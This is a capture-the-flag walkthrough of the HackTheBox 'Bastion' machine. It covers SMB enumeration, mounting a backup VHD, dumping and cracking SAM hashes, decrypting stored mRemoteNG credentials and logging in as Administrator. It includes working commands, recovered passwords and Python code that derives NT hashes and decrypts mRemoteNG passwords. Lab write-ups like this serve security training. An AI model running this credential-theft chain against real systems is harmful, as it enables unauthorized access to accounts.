Bastion
Difficulty: Easy - OS: Windows
Port/service enumeration
┌──(root㉿kali)-[/home/kali/Documents/HTB]
└─# nmap -sCV --open -T4 -v -n 10.10.10.134
Result:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-04-27T06:13:39
|_ start_date: 2025-04-27T05:18:29
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-04-27T08:13:41+02:00
|_clock-skew: mean: -38m36s, deviation: 1h09m14s, median: 1m21s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
The ports of interest:
Port | State | Service | Protocol
22/tcp | open | ssh (OpenSSH 7.9) | TCP
139/tcp | open | netbios-ssn | TCP
445/tcp | open | Microsoft-DS | TCP
SMB share enumeration
This time we use the nxc tool to check whether we have read or write permissions on the shares.
┌──(root㉿kali)-[/home/kali/Documents/HTB]
└─# nxc smb 10.10.10.134 -u 'a' -p '' --shares
SMB 10.10.10.134 445 BASTION [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)
SMB 10.10.10.134 445 BASTION [+] Bastion\a: (Guest)
SMB 10.10.10.134 445 BASTION [*] Enumerated shares
SMB 10.10.10.134 445 BASTION Share Permissions Remark
SMB 10.10.10.134 445 BASTION ----- ----------- ------
SMB 10.10.10.134 445 BASTION ADMIN$ Remote Admin
SMB 10.10.10.134 445 BASTION Backups READ,WRITE
SMB 10.10.10.134 445 BASTION C$ Default share
SMB 10.10.10.134 445 BASTION IPC$ Remote IPC
Identifying the backup files
The share we want to look at is Backups. We use smbclient to browse its contents and look for sensitive information or files.
┌──(root㉿kali)-[/home/kali/Documents/HTB]
└─# smbclient //10.10.10.134/backups -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Apr 16 06:02:11 2019
.. D 0 Tue Apr 16 06:02:11 2019
note.txt AR 116 Tue Apr 16 06:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 07:44:02 2019
5638911 blocks of size 4096. 1178907 blocks available
smb: \> get note.txt
getting file \note.txt of size 116 as note.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> cat note.txt
cat: command not found
smb: \> !cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
smb: \> cd WindowsImageBackup\
smb: \WindowsImageBackup\> dir
. Dn 0 Fri Feb 22 07:44:02 2019
.. Dn 0 Fri Feb 22 07:44:02 2019
L4mpje-PC Dn 0 Fri Feb 22 07:45:32 2019
5638911 blocks of size 4096. 1177973 blocks available
smb: \WindowsImageBackup\> cd L4mpje-PC\
smb: \WindowsImageBackup\L4mpje-PC\> dir
. Dn 0 Fri Feb 22 07:45:32 2019
.. Dn 0 Fri Feb 22 07:45:32 2019
Backup 2019-02-22 124351 Dn 0 Fri Feb 22 07:45:32 2019
Catalog Dn 0 Fri Feb 22 07:45:32 2019
MediaId An 16 Fri Feb 22 07:44:02 2019
SPPMetadataCache Dn 0 Fri Feb 22 07:45:32 2019
5638911 blocks of size 4096. 1177931 blocks available
smb: \WindowsImageBackup\L4mpje-PC\> cd "Backup 2019-02-22 124351"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> dir
. Dn 0 Fri Feb 22 07:45:32 2019
.. Dn 0 Fri Feb 22 07:45:32 2019
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd An 37761024 Fri Feb 22 07:44:03 2019
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd An 5418299392 Fri Feb 22 07:45:32 2019
BackupSpecs.xml An 1186 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml An 1078 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml An 8930 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml An 6542 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml An 2894 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml An 1488 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml An 1484 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml An 3844 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml An 3988 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml An 7110 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml An 2374620 Fri Feb 22 07:45:32 2019
5638911 blocks of size 4096. 1173840 blocks available
Mounting and analysing the VHD
A tidier way to view the contents of the Backups share is to mount it on our own machine as follows:
┌──(root㉿kali)-[/home/kali/Documents/HTB/BASTION]
└─# mkdir smb_shares_backup
┌──(root㉿kali)-[/home/kali/Documents/HTB/BASTION]
└─# mount -t cifs //10.10.10.134/Backups ./smb_shares_backup -o rw -o username=guest
Password for guest@//10.10.10.134/Backups:
┌──(root㉿kali)-[/home/kali/Documents/HTB/BASTION]
└─# tree -ha smb_shares_backup
[4.0K] smb_shares_backup
├── [ 0] cyiWwVfZQB
├── [ 0] FlpNkybTvX.txt
├── [ 0] HXZiyDARPb
├── [ 116] note.txt
├── [ 0] SDT65CB.tmp
├── [ 0] WFCBUztHSM.txt
└── [ 0] WindowsImageBackup
└── [ 0] L4mpje-PC
├── [ 0] Backup 2019-02-22 124351
│  ├── [ 36M] 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
│  ├── [5.0G] 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
│  ├── [1.2K] BackupSpecs.xml
│  ├── [1.1K] cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
│  ├── [8.7K] cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
│  ├── [6.4K] cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
│  ├── [2.8K] cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
│  ├── [1.5K] cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
│  ├── [1.4K] cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
│  ├── [3.8K] cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
│  ├── [3.9K] cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
│  ├── [6.9K] cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
│  └── [2.3M] cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
├── [ 0] Catalog
│  ├── [5.6K] BackupGlobalCatalog
│  └── [7.3K] GlobalCatalog
├── [ 16] MediaId
└── [ 0] SPPMetadataCache
└── [ 56K] {cd113385-65ff-4ea2-8ced-5630f6feca8f}
8 directories, 21 files
What actually matters here?
The folder Backup 2019-02-22 124351:
→ This folder is where the VHD or VHDX files, i.e. the virtual disks, are usually stored.
→ These VHDs contain full copies of partitions or volumes of the system that was backed up.
The VHD we are interested in is the [5.0G] 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd.
From it we can extract critical files such as:
→ SAM (Security Account Manager), from which the password hashes are taken.
→ SYSTEM, which is needed to decrypt those hashes.
Now, to mount the VHD on our machine, we use the following command:
┌──(root㉿kali)-[/home/kali/Documents/HTB/BASTION]
└─# mkdir backup
┌──(root㉿kali)-[/home/kali/Documents/HTB/BASTION]
└─# guestmount -a /mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /home/kali/Documents/HTB/BASTION/backup
Extracting the SAM and SYSTEM files
Listing the contents, we see the directories of a backed-up system and that we are at the root of the C: partition. Rather than getting lost among all the system files, we go straight for the NTLM password hashes that Windows normally stores. Because we are working on the backup, we can read these files without restrictions, so we head directly to Windows/System32/config, where the SAM, SYSTEM and SECURITY hives are stored; these are crucial to the system's authentication and security.
┌──(root㉿kali)-[/home/kali/Documents/HTB/BASTION]
└─# ls -la backup
total 2096745
drwxrwxrwx 1 root root 12288 Feb 22 2019 .
drwxr-xr-x 4 root root 4096 Apr 27 21:26 ..
drwxrwxrwx 1 root root 0 Feb 22 2019 '$Recycle.Bin'
-rwxrwxrwx 1 root root 24 Jun 10 2009 autoexec.bat
-rwxrwxrwx 1 root root 10 Jun 10 2009 config.sys
lrwxrwxrwx 2 root root 14 Jul 14 2009 'Documents and Settings' -> /sysroot/Users
-rwxrwxrwx 1 root root 2147016704 Feb 22 2019 pagefile.sys
drwxrwxrwx 1 root root 0 Jul 13 2009 PerfLogs
drwxrwxrwx 1 root root 4096 Jul 14 2009 ProgramData
drwxrwxrwx 1 root root 4096 Apr 11 2011 'Program Files'
drwxrwxrwx 1 root root 0 Feb 22 2019 Recovery
drwxrwxrwx 1 root root 4096 Feb 22 2019 'System Volume Information'
drwxrwxrwx 1 root root 4096 Feb 22 2019 Users
drwxrwxrwx 1 root root 16384 Feb 22 2019 Windows
┌──(root㉿kali)-[/home/kali/Documents/HTB/BASTION]
└─# cd backup/Windows/System32/config
┌──(root㉿kali)-[/home/…/backup/Windows/System32/config]
└─# ls -la SAM
-rwxrwxrwx 1 root root 262144 Feb 22 2019 SAM
┌──(root㉿kali)-[/home/…/backup/Windows/System32/config]
└─# ls -la SYSTEM
-rwxrwxrwx 1 root root 9699328 Feb 22 2019 SYSTEM
┌──(root㉿kali)-[/home/…/backup/Windows/System32/config]
└─# ls -la SECURITY
-rwxrwxrwx 1 root root 262144 Feb 22 2019 SECURITY
So we do the following:
→ Create a directory on our local machine and copy the SAM, SYSTEM and SECURITY files into it.
→ Once they are copied, move into that folder (in my case windowsconf) and use impacket-secretsdump to dump the NTLM hashes, then save those hashes to a .txt file (in my case hashes.txt).
→ With the hashes in hand, crack them with John the Ripper using the rockyou.txt wordlist and the file where we saved them (hashes.txt).
┌──(root㉿kali)-[/home/…/backup/Windows/System32/config]
└─# mkdir /home/kali/Documents/HTB/BASTION/windowsconf
┌──(root㉿kali)-[/home/…/backup/Windows/System32/config]
└─# cp SAM /home/kali/Documents/HTB/BASTION/windowsconf
┌──(root㉿kali)-[/home/…/backup/Windows/System32/config]
└─# cp SYSTEM /home/kali/Documents/HTB/BASTION/windowsconf
┌──(root㉿kali)-[/home/…/backup/Windows/System32/config]
└─# cp SECURITY /home/kali/Documents/HTB/BASTION/windowsconf
Dumping and cracking the hashes
┌──(root㉿kali)-[/home/…/backup/Windows/System32/config]
└─# cd /home/kali/Documents/HTB/BASTION/windowsconf
┌──(root㉿kali)-[/home/…/Documents/HTB/BASTION/windowsconf]
└─# ls
SAM SECURITY SYSTEM
┌──(root㉿kali)-[/home/…/Documents/HTB/BASTION/windowsconf]
└─# impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd
[*] Cleaning up...
┌──(root㉿kali)-[/home/…/Documents/HTB/BASTION/windowsconf]
└─# nano hashes.txt
┌──(root㉿kali)-[/home/…/Documents/HTB/BASTION/windowsconf]
└─# john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
(Administrator)
bureaulampje (L4mpje)
2g 0:00:00:00 DONE (2025-04-27 22:59) 4.255g/s 19990Kp/s 19990Kc/s 20000KC/s burg772v..burdy1
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.
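Added here as an illustration, not code from the original writeup: the SAM lines above are pwdump-style user:rid:lmhash:nthash records, where aad3b435b51404eeaad3b435b51404ee is the LM field when no LM hash is stored and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of the empty string (which is why john printed a blank password for Administrator). The script parses the dump, flags those sentinels, and verifies a candidate the way john does, computing NT = MD4(UTF-16LE(password)) with a pure-Python MD4; the unsalted MD4 is what allows the guess rate john reports above. The dump lines and the candidate password are copied from the output above.

```python
import struct

# Sentinel values: the LM field when no LM hash is stored, and the NT hash of the empty string
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# SAM lines copied from the secretsdump output above (user:rid:lmhash:nthash:::)
SAM_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
"""

_rotl = lambda x, s: ((x << s) | (x >> (32 - s))) & 0xFFFFFFFF

def md4(msg: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often unavailable on OpenSSL 3 builds."""
    bit_len = len(msg) * 8
    msg += b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", bit_len)
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (  # (round function, additive constant, message-word order, shift table)
        (F, 0x00000000, range(16), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                a = _rotl((a + fn(b, c, d) + X[idx] + k) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers: the next step updates what was d
        state = [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE password; there is no salt, so guesses are cheap."""
    return md4(password.encode("utf-16-le")).hex()

def parse_pwdump(text: str) -> list:
    """Parse pwdump-style lines, flagging blank passwords and accounts that still store an LM hash."""
    rows = []
    for line in text.splitlines():
        if line.count(":") < 3:
            continue
        user, rid, lm, nt = line.split(":")[:4]
        rows.append({"user": user, "rid": int(rid), "nt": nt.lower(),
                     "blank_password": nt.lower() == EMPTY_NT, "lm_stored": lm.lower() != EMPTY_LM})
    return rows

def check_candidate(rows: list, user: str, candidate: str) -> bool:
    """Offline check of one guess for one account: the comparison a cracker makes per candidate."""
    return any(r["user"] == user and r["nt"] == nt_hash(candidate) for r in rows)

if __name__ == "__main__":
    rows = parse_pwdump(SAM_DUMP)
    print(rows, check_candidate(rows, "L4mpje", "bureaulampje"))
```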
Initial access and enumerating installed software
This gives us a credential we can use to connect over SSH on port 22. Once on the system we could try many things, such as enumerating user permissions or locating specific files, but for this machine the useful step is enumerating the installed applications. To do so we run the following commands through PowerShell:
l4mpje@BASTION C:\>dir '.\Program Files (x86)\'
The system cannot find the file specified.
l4mpje@BASTION C:\>powershell -Command "ls '.\Program Files (x86)\'"
Directory: C:\Program Files (x86)
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 16-7-2016 15:23 Common Files
d----- 23-2-2019 09:38 Internet Explorer
d----- 16-7-2016 15:23 Microsoft.NET
da---- 22-2-2019 14:01 mRemoteNG
d----- 23-2-2019 10:22 Windows Defender
d----- 23-2-2019 09:38 Windows Mail
d----- 23-2-2019 10:22 Windows Media Player
d----- 16-7-2016 15:23 Windows Multimedia Platform
d----- 16-7-2016 15:23 Windows NT
d----- 23-2-2019 10:22 Windows Photo Viewer
d----- 16-7-2016 15:23 Windows Portable Devices
d----- 16-7-2016 15:23 WindowsPowerShell
l4mpje@BASTION C:\>powershell -Command "Get-ItemProperty 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName"
DisplayName
-----------
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.24.28127
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.24.28127
mRemoteNG
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.24.28127
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.24.28127
l4mpje@BASTION C:\>powershell -Command "Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName"
DisplayName
-----------
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
VMware Tools
Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.24.28127
Microsoft Visual C++ 2019 X64 Additional Runtime - 14.24.28127
Extracting credentials from mRemoteNG
We find the mRemoteNG tool. With this application we can look for credentials exposed in its configuration files.
l4mpje@BASTION C:\>dir %APPDATA%\mRemoteNG\
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG
22-02-2019 15:03 <DIR> .
22-02-2019 15:03 <DIR> ..
22-02-2019 15:03 6.316 confCons.xml
22-02-2019 15:02 6.194 confCons.xml.20190222-1402277353.backup
22-02-2019 15:02 6.206 confCons.xml.20190222-1402339071.backup
22-02-2019 15:02 6.218 confCons.xml.20190222-1402379227.backup
22-02-2019 15:02 6.231 confCons.xml.20190222-1403070644.backup
22-02-2019 15:03 6.319 confCons.xml.20190222-1403100488.backup
22-02-2019 15:03 6.318 confCons.xml.20190222-1403220026.backup
22-02-2019 15:03 6.315 confCons.xml.20190222-1403261268.backup
22-02-2019 15:03 6.316 confCons.xml.20190222-1403272831.backup
22-02-2019 15:03 6.315 confCons.xml.20190222-1403433299.backup
22-02-2019 15:03 6.316 confCons.xml.20190222-1403486580.backup
22-02-2019 15:03 51 extApps.xml
22-02-2019 15:03 5.217 mRemoteNG.log
22-02-2019 15:03 2.245 pnlLayout.xml
22-02-2019 15:01 <DIR> Themes
14 File(s) 76.577 bytes
3 Dir(s) 4.806.193.152 bytes free
We see many confCons.xml files; we read the one that is not a backup:
l4mpje@BASTION C:\>type \Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" [.......] InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
</mrng:Connections>
We have found the Administrator's credentials; now we only need to decrypt them to use the SSH connection. For this we use mremoteng_decrypt.py, a tool written specifically for this encryption format:
┌──(root㉿kali)-[/home/kali/Documents/HTB/BASTION]
└─# wget https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/refs/heads/master/mremoteng_decrypt.py
--2025-04-28 01:33:47-- https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/refs/heads/master/mremoteng_decrypt.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.110.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1535 (1.5K) [text/plain]
Saving to: ‘mremoteng_decrypt.py’
mremoteng_decrypt.py 100%[============================>] 1.50K --.-KB/s in 0s
2025-04-28 01:33:47 (11.2 MB/s) - ‘mremoteng_decrypt.py’ saved [1535/1535]
┌──(root㉿kali)-[/home/kali/Documents/HTB/BASTION]
└─# ls
backup mremoteng_decrypt.py smb_shares_backup windowsconf
┌──(root㉿kali)-[/home/kali/Documents/HTB/BASTION]
└─# python3 mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2
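Added here as an illustration (not part of the original writeup, of mRemoteNG, or of the decrypt script), this is the scheme the tool above undoes, exactly as the file's own attributes state: EncryptionEngine AES, BlockCipherMode GCM, KdfIterations 1000, with each Password value holding base64(salt | nonce | ciphertext | tag) and the key derived by PBKDF2-HMAC-SHA1 from the master password and that salt. The audit below parses a confCons.xml and reports every connection whose password decrypts with mRemoteNG's built-in default master password, which is what makes such a file readable to anyone who can copy it. It assumes the cryptography package, the default master password "mR3m", and a confCons.xml constructed from the Node shown above with the elided attributes dropped.

```python
import base64
import hashlib
import xml.etree.ElementTree as ET
try:
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM
except ImportError:
    AESGCM = None  # decrypt_blob() refuses to run without the cryptography package

DEFAULT_MASTER = "mR3m"  # mRemoteNG's built-in master password when the user never sets one

# Constructed confCons.xml for this example: the Node from the page with the elided attributes dropped
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false"
  EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false"
  Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA"
  ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator"
    Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
    Hostname="127.0.0.1" Protocol="RDP" />
</mrng:Connections>
"""

def split_blob(b64: str) -> dict:
    """An mRemoteNG AES-GCM blob is base64 of salt(16) | nonce(16) | ciphertext | tag(16)."""
    raw = base64.b64decode(b64)
    return {"salt": raw[:16], "nonce": raw[16:32], "ciphertext": raw[32:-16], "tag": raw[-16:]}

def decrypt_blob(b64: str, master: str = DEFAULT_MASTER, iterations: int = 1000) -> str:
    """Return the plaintext; raises when the GCM tag fails, i.e. the master password is wrong."""
    if AESGCM is None:
        raise RuntimeError("the cryptography package is required")
    p = split_blob(b64)
    key = hashlib.pbkdf2_hmac("sha1", master.encode(), p["salt"], iterations, dklen=32)
    # The salt doubles as associated data; cryptography expects ciphertext||tag in one buffer
    return AESGCM(key).decrypt(p["nonce"], p["ciphertext"] + p["tag"], p["salt"]).decode()

def audit_confcons(xml_text: str, master: str = DEFAULT_MASTER) -> list:
    """One finding per connection, saying whether its password falls to the given master password."""
    if AESGCM is None:
        raise RuntimeError("the cryptography package is required")
    root = ET.fromstring(xml_text)
    iterations = int(root.get("KdfIterations", "1000"))
    findings = []
    for node in root.iter("Node"):
        if not node.get("Password"):
            continue
        try:
            decrypt_blob(node.get("Password"), master, iterations)
            weak = True
        except Exception:  # InvalidTag: this file was not protected with that master password
            weak = False
        findings.append({"name": node.get("Name"), "user": node.get("Username"),
                         "host": node.get("Hostname"), "default_master_password": weak})
    return findings

if __name__ == "__main__":
    for finding in audit_confcons(SAMPLE_CONFCONS):
        print(finding)
```

The audit deliberately reports only the boolean, never the recovered value; decrypt_blob is kept separate so the format itself can be studied.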
Access as Administrator
Now we connect and go for the flags ( ͡° ͜ʖ ͡°)
┌──(root㉿kali)-[/home/kali/Documents/HTB/BASTION]
└─# ssh Administrator@10.10.10.134 -o StrictHostKeyChecking=no
Administrator@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>type \Users\Administrator\Desktop\root.txt
d8419a**************************
administrator@BASTION C:\Users\Administrator>type \Users\L4mpje\Desktop\user.txt
d3f88e**************************